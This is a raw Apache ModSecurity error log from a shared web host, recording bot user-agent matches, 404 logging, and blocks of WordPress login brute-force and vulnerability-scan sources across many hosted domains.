[Tue May 26 15:19:14.924037 2026] [security2:error] [pid 700087:tid 700243] [client 74.7.244.10:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "algosoftware.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVsmpPHQM4as9fEIIajtgAAABo"], referer: https://www.algosoftware.bloggertarget.com/robots.txt
[Tue May 26 15:19:14.930833 2026] [security2:error] [pid 700087:tid 700320] [client 74.7.244.10:34876] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "algosoftware.bloggertarget.com"] [uri "/robots.txt"] [unique_id "ahVsmpPHQM4as9fEIIajtAAAZxc"], referer: https://www.algosoftware.bloggertarget.com/robots.txt
[Tue May 26 15:19:16.121399 2026] [security2:error] [pid 700087:tid 700239] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsm5PHQM4as9fEIIajzAAAABY"]
[Tue May 26 15:19:18.387106 2026] [security2:error] [pid 700087:tid 700227] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsnZPHQM4as9fEIIakIwAAAAo"]
[Tue May 26 15:19:19.621257 2026] [security2:error] [pid 700087:tid 700343] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsn5PHQM4as9fEIIakWgAAAH4"]
[Tue May 26 15:19:22.088556 2026] [security2:error] [pid 700087:tid 700307] [client 51.68.111.218:14671] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "lagoslawntennisclub1895.com"] [uri "/robots.txt"] [unique_id "ahVsopPHQM4as9fEIIakrQAAAFo"]
[Tue May 26 15:19:22.088669 2026] [security2:error] [pid 700087:tid 700307] [client 51.68.111.218:14671] ModSecurity: Warning. Matched phrase "MJ12bot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "lagoslawntennisclub1895.com"] [uri "/robots.txt"] [unique_id "ahVsopPHQM4as9fEIIakrQAAAFo"]
[Tue May 26 15:19:22.513032 2026] [security2:error] [pid 700087:tid 700243] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsopPHQM4as9fEIIakrAAAABo"]
[Tue May 26 15:19:22.540035 2026] [security2:error] [pid 700087:tid 700273] [client 114.119.151.179:32637] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "rohiniventures.com"] [uri "/blog/category/post-formats/"] [unique_id "ahVsopPHQM4as9fEIIakvQAAADg"], referer: http://rohiniventures.com/blog/2010/06/02/post-format-video-youtube/
[Tue May 26 15:19:22.728589 2026] [autoindex:error] [pid 700087:tid 700315] [client 205.210.31.183:0] AH01276: Cannot serve directory /home2/debatqhn/newnigeria.media/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:19:24.333960 2026] [security2:error] [pid 700087:tid 700258] [client 193.37.33.149:53521] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.33.37.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/wp-login.php"] [unique_id "ahVspJPHQM4as9fEIIak_AAAACk"]
[Tue May 26 15:19:24.740313 2026] [security2:error] [pid 700087:tid 700225] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVspJPHQM4as9fEIIalAwAAAAg"]
[Tue May 26 15:19:26.628727 2026] [security2:error] [pid 700087:tid 700310] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsppPHQM4as9fEIIalVwAAAF0"]
[Tue May 26 15:19:28.347431 2026] [security2:error] [pid 700087:tid 700331] [client 209.124.225.152:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsp5PHQM4as9fEIIalkQAAAHI"]
[Tue May 26 15:19:28.889446 2026] [security2:error] [pid 700087:tid 700310] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsqJPHQM4as9fEIIalogAAAF0"]
[Tue May 26 15:19:30.089814 2026] [security2:error] [pid 700087:tid 700237] [client 51.210.32.231:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVsqpPHQM4as9fEIIal1QAAABQ"]
[Tue May 26 15:19:30.794933 2026] [security2:error] [pid 700087:tid 700297] [client 51.210.32.231:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVsqpPHQM4as9fEIIal_wAAAFA"]
[Tue May 26 15:19:31.097246 2026] [security2:error] [pid 700087:tid 700238] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsqpPHQM4as9fEIIal9wAAABU"]
[Tue May 26 15:19:31.292687 2026] [security2:error] [pid 700087:tid 700108] [remote 74.7.241.58:44486] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahVsq5PHQM4as9fEIIamGgAAMBQ"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/nationspioneer.com/wp-includes
[Tue May 26 15:19:31.359222 2026] [security2:error] [pid 700087:tid 700256] [client 51.210.32.231:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVsq5PHQM4as9fEIIamGQAAACc"]
[Tue May 26 15:19:32.214223 2026] [security2:error] [pid 700087:tid 700166] [remote 64.233.173.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahVsq5PHQM4as9fEIIamOAAAbE4"]
[Tue May 26 15:19:32.841611 2026] [security2:error] [pid 700087:tid 700193] [remote 47.128.121.75:0] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "kingsclub.in"] [uri "/robots.txt"] [unique_id "ahVsrJPHQM4as9fEIIamVAAAa2k"]
[Tue May 26 15:19:33.431390 2026] [security2:error] [pid 700087:tid 700294] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsrZPHQM4as9fEIIamXgAAAE0"]
[Tue May 26 15:19:35.206023 2026] [security2:error] [pid 700087:tid 700256] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsrpPHQM4as9fEIIamlwAAACc"]
[Tue May 26 15:19:36.748476 2026] [security2:error] [pid 700087:tid 700112] [remote 209.42.19.17:45476] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.19.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahVssJPHQM4as9fEIIamywAAPBg"]
[Tue May 26 15:19:37.147311 2026] [security2:error] [pid 700087:tid 700307] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVssJPHQM4as9fEIIamzgAAAFo"]
[Tue May 26 15:19:37.690374 2026] [security2:error] [pid 700087:tid 700222] [client 114.119.150.168:44997] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/index.php"] [unique_id "ahVssZPHQM4as9fEIIam6wAAAAU"], referer: http://glorodavionics.com/index.php?route=account/transaction
[Tue May 26 15:19:38.655048 2026] [security2:error] [pid 700087:tid 700254] [client 64.233.173.101:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVsspPHQM4as9fEIIanAAAAACU"]
[Tue May 26 15:19:39.922475 2026] [security2:error] [pid 700087:tid 700318] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVss5PHQM4as9fEIIanKgAAAGU"]
[Tue May 26 15:19:41.968667 2026] [security2:error] [pid 700087:tid 700242] [client 85.208.96.207:32640] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/winter/list/"] [unique_id "ahVstZPHQM4as9fEIIandwAAABk"]
[Tue May 26 15:19:41.968782 2026] [security2:error] [pid 700087:tid 700242] [client 85.208.96.207:32640] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/winter/list/"] [unique_id "ahVstZPHQM4as9fEIIandwAAABk"]
[Tue May 26 15:19:42.300748 2026] [security2:error] [pid 700087:tid 700283] [client 157.90.156.63:39218] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahVstZPHQM4as9fEIIanbwAAAEI"], referer: https://thegoodsporting.com
[Tue May 26 15:19:42.361290 2026] [security2:error] [pid 700087:tid 700321] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVstZPHQM4as9fEIIandQAAAGg"]
[Tue May 26 15:19:44.137893 2026] [security2:error] [pid 700087:tid 700300] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVst5PHQM4as9fEIIanrAAAAFM"]
[Tue May 26 15:19:46.319157 2026] [security2:error] [pid 700087:tid 700233] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsuZPHQM4as9fEIIan9QAAABA"]
[Tue May 26 15:19:48.047753 2026] [security2:error] [pid 700087:tid 700319] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsu5PHQM4as9fEIIaoKwAAAGY"]
[Tue May 26 15:19:50.501786 2026] [security2:error] [pid 700087:tid 700266] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsvpPHQM4as9fEIIaohAAAADE"]
[Tue May 26 15:19:52.374382 2026] [security2:error] [pid 700087:tid 700301] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsv5PHQM4as9fEIIaouAAAAFQ"]
[Tue May 26 15:19:54.119535 2026] [security2:error] [pid 700087:tid 700098] [remote 20.219.17.202:49504] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 202.17.219.20.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahVswZPHQM4as9fEIIao2wAAKwo"]
[Tue May 26 15:19:54.939051 2026] [security2:error] [pid 700087:tid 700315] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVswpPHQM4as9fEIIao5wAAAGI"]
[Tue May 26 15:19:55.069675 2026] [security2:error] [pid 700087:tid 700168] [remote 121.200.216.55:45240] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.216.200.121.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahVswpPHQM4as9fEIIao7AAAElA"]
[Tue May 26 15:19:56.223558 2026] [security2:error] [pid 700087:tid 700124] [remote 216.73.217.110:1718] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 110.217.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rainadelproperties.com"] [uri "/webhook.php"] [unique_id "ahVsxJPHQM4as9fEIIapAQAAJyQ"]
[Tue May 26 15:19:56.630077 2026] [security2:error] [pid 700087:tid 700322] [client 114.119.148.160:63441] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVsxJPHQM4as9fEIIapCQAAAGk"], referer: https://www.glorodrc.com/index.php?route=product/product&product_id=107
[Tue May 26 15:19:56.970513 2026] [security2:error] [pid 700087:tid 700321] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsxJPHQM4as9fEIIapBQAAAGg"]
[Tue May 26 15:19:57.572487 2026] [security2:error] [pid 700087:tid 700277] [client 146.174.168.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsxZPHQM4as9fEIIapHQAAADw"]
[Tue May 26 15:19:58.466037 2026] [security2:error] [pid 700087:tid 700322] [client 191.101.92.102:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVsxpPHQM4as9fEIIapQAAAAGk"], referer: https://www.anujtradingco.com/
[Tue May 26 15:19:59.244594 2026] [security2:error] [pid 700087:tid 700218] [client 191.101.92.102:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVsx5PHQM4as9fEIIapVwAAAAE"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1441499&moderation-hash=60e0252c7cefad21d853263946023c12
[Tue May 26 15:19:59.256710 2026] [security2:error] [pid 700087:tid 700335] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsxpPHQM4as9fEIIapTAAAAHY"]
[Tue May 26 15:19:59.575741 2026] [security2:error] [pid 700087:tid 700173] [remote 124.156.212.23:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 23.212.156.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahVsx5PHQM4as9fEIIapWwAAelU"]
[Tue May 26 15:20:00.800834 2026] [security2:error] [pid 700087:tid 700261] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsyJPHQM4as9fEIIapgwAAACw"]
[Tue May 26 15:20:01.382934 2026] [security2:error] [pid 700087:tid 700323] [client 191.101.92.102:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVsyZPHQM4as9fEIIapqQAAAGo"], referer: https://anujtradingco.com
[Tue May 26 15:20:01.698479 2026] [security2:error] [pid 700087:tid 700342] [client 114.119.137.128:28039] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ameritradeng.com"] [uri "/recent_clients.php"] [unique_id "ahVsyZPHQM4as9fEIIaptgAAAH0"], referer: https://www.ameritradeng.com/recent_clients.php
[Tue May 26 15:20:02.176780 2026] [security2:error] [pid 700087:tid 700136] [remote 121.200.216.55:45248] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.216.200.121.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "theafterglow-centre.com"] [uri "/wp-login.php"] [unique_id "ahVsypPHQM4as9fEIIapxAAAEjA"]
[Tue May 26 15:20:03.554769 2026] [security2:error] [pid 700087:tid 700301] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsy5PHQM4as9fEIIap5QAAAFQ"]
[Tue May 26 15:20:04.861958 2026] [security2:error] [pid 700087:tid 700254] [client 46.8.57.191:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVszJPHQM4as9fEIIaqKgAAACU"], referer: https://www.anujtradingco.com/
[Tue May 26 15:20:05.683707 2026] [security2:error] [pid 700087:tid 700339] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVszZPHQM4as9fEIIaqPQAAAHo"]
[Tue May 26 15:20:06.127379 2026] [security2:error] [pid 700087:tid 700211] [remote 160.250.186.220:58714] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.186.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "haddingtonwines.com"] [uri "/wp-login.php"] [unique_id "ahVszZPHQM4as9fEIIaqVQAAS3s"]
[Tue May 26 15:20:06.382510 2026] [security2:error] [pid 700087:tid 700275] [client 66.249.64.171:49725] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahVszZPHQM4as9fEIIaqPgAAADo"], referer: http://doyecpa.com/prizes/241956157%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20class=
[Tue May 26 15:20:06.564886 2026] [http2:info] [pid 707292:tid 707292] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 15:20:06.892248 2026] [security2:error] [pid 707292:tid 707443] [client 153.75.250.147:46570] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.250.75.153.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/wp-content/themes/bootstrap-ultimate/docs/thanks.php"] [unique_id "ahVsztKAqlRPSIEFAutVuAAAAJo"]
[Tue May 26 15:20:08.007920 2026] [security2:error] [pid 707292:tid 707518] [client 46.8.57.191:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVsz9KAqlRPSIEFAutV4gAAAOU"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1230859&moderation-hash=2aac02f82ca332a981ba185237eedd5a
[Tue May 26 15:20:08.056950 2026] [security2:error] [pid 707292:tid 707496] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsz9KAqlRPSIEFAutV0QAAAM8"]
[Tue May 26 15:20:09.607740 2026] [security2:error] [pid 707292:tid 707479] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVs0dKAqlRPSIEFAutWDAAAAL4"]
